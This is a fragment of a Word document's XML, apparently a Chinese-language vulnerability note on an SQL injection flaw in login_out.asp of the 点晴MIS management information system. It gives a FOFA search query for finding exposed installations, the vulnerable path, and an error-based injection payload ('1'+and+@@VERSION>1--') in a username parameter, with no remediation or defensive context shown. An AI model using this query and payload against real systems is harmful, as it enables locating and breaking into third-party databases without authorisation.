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BFE45">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点晴MIS管理信息系统 login_out.asp SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D70A58F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEE9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FOFA：title="点晴MIS管理信息系统"</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="10229275">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AFC3C4"/>
    <w:p w14:paraId="0E84A24B"/>
    <w:p w14:paraId="59B0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80ABD29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE5831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/login_out.asp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43A283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62A9EA2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17F4898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oabusyusername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1'+and+@@VERSION&gt;1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F94B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472B902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E795D"/>
    <w:rsid w:val="2523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233</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>248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2025-11-27T10:16:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:09:43Z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A0C225325C3148E2A87EB29880AC58A1_12</vt:lpwstr>
  </property>
</Properties>
</file>